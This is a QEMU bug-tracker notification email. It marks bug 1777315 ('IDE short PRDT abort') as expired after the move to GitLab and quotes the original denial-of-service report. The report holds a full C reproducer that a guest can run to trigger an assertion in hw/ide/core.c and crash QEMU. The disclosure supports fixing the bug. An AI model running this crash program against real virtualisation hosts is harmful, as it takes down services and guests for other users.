This is an automated cleanup. This bug report has been moved to QEMU's new bug tracker on gitlab.com and thus gets marked as 'expired' now. Please continue with the discussion here:
https://gitlab.com/qemu-project/qemu/-/issues/57 ** Changed in: qemu Status: In Progress => Expired ** Changed in: qemu Assignee: John Snow (jnsnow) => (unassigned) ** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57 https://gitlab.com/qemu-project/qemu/-/issues/57 -- You received this bug notification because you are a member of qemu- devel-ml, which is subscribed to QEMU. https://bugs.launchpad.net/bugs/1777315 Title: IDE short PRDT abort Status in QEMU: Expired Bug description: Hi, QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0 run the program in qemu-2.12.0: #define _GNU_SOURCE #include <endian.h> #include <sys/syscall.h> #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <sys/stat.h> #include <stdint.h> #include <string.h> static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2) { if (a0 == 0xc || a0 == 0xb) { char buf[128]; sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2); return open(buf, O_RDWR, 0); } else { char buf[1024]; char* hash; strncpy(buf, (char*)a0, sizeof(buf) - 1); buf[sizeof(buf) - 1] = 0; while ((hash = strchr(buf, '#'))) { *hash = '0' + (char)(a1 % 10); a1 /= 10; } return open(buf, a2, 0); } } uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; void loop() { long res = 0; memcpy((void*)0x20000000, "/dev/sg#", 9); res = syz_open_dev(0x20000000, 0, 2); if (res != -1) r[0] = res; res = syscall(__NR_dup2, r[0], r[0]); if (res != -1) r[1] = res; *(uint8_t*)0x20000ec0 = 0; *(uint8_t*)0x20000ec1 = 0; *(uint8_t*)0x20000ec2 = 0; *(uint8_t*)0x20000ec3 = 0; *(uint32_t*)0x20000ec8 = 0; *(uint8_t*)0x20000ed8 = 0; *(uint8_t*)0x20000ed9 = 0; *(uint8_t*)0x20000eda = 0; *(uint8_t*)0x20000edb = 0; memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12); syscall(__NR_write, r[1], 0x20000ec0, 0x323); } int main() { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); loop(); return 0; } this will crash qemu, output information: qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed. Thanks owl337 To manage notifications about this bug go to: https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
